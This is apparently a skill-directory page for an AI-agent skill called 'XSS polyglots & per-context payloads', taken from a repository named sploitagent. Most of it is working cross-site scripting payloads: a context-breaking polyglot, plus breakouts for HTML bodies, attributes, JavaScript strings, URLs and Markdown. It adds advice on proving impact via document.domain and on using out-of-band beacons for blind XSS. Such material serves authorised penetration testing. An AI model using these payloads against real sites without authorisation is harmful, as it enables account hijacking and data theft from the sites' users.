XSS polyglots & per-context payloads
SkillAI & modelsContext-breaking XSS polyglots and per-context payloads that fire across HTML/attribute/JS/ URL sinks in one shot. Load when confirming XSS fast, unsure of the injection context, or a single test payload should cover many contexts. Signals: reflected input, XSS triage, "polyglot".
Instructions available. Your AI can read the instructions. Execution depends on the setup they require.
Account requirements not reviewed. Check the skill instructions before use; ahel provides instructions and does not run this skill.
Add ahel to your AI once: Claude, ChatGPT, Cursor, Claude Code or Codex. Then ask it to use this.
Then ask your AI: use the XSS polyglots & per-context payloads skill
What this skill tells your AI
The instructions your AI receives, as published by noorqureshi/sploitagent in skills/payloads/payloads-xss-polyglots/SKILL.md and read by ahel’s review.
When it applies
You want one payload that reveals reflection/execution regardless of where it lands, then a
context-specific finisher once you know the spot. Pairs with web-xss.
Why it works
A polyglot is crafted to be syntactically valid (and break out) in multiple contexts at once — HTML body, attribute, JS string, comment — so a single injection surfaces the vulnerable context.
Payloads
Polyglot (fires broadly):
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Per context (once you know where you landed):
- HTML body:
<svg onload=alert(document.domain)> - Attribute (break out first):
"><svg onload=alert(document.domain)>or" autofocus onfocus=alert() x=" - JS string:
';alert(document.domain)//or</script><svg onload=alert()> - URL/href:
javascript:alert(document.domain) - Markdown:
[x](javascript:alert(1))/ - Attribute w/o quotes:
x onmouseover=alert()
WAF-resistant variants: see payloads-waf-bypass (event/tag variety, encoding, no-parens).
Gotchas
- Prove real impact with
document.domain(right origin), not sandboxedalert(1). - Blind/stored XSS: use an OOB payload that beacons to your collaborator instead of
alert. - If it reflects encoded, you have the right context but wrong breakout — adjust, don't add tags.
References
PortSwigger XSS cheat sheet; 0xsobky "Unleashing an Ultimate XSS Polyglot".
Signals
- GitHub stars
- 20
- Forks
- 7
- Last commit
- Sep 2026
Advanced
- Item type
- skill
- Key
payloads-xss-polyglots- Source
- github.com/noorqureshi/sploitagent
github.com/noorqureshi/sploitagent
Related picks
Skill · thedaviddias
The pick for JavaScriptmodern-javascript-patterns
Skill · wshobson
The pick for JavaScriptlark-markdown
Skill · larksuite
The pick for Markdownmarkdown-mermaid-writing
Skill · k-dense-ai
The pick for Markdownowasp-security
Skill · davila7
The pick for Web (OWASP)owasp-web
Skill · nahid-sparktales
The pick for Web (OWASP)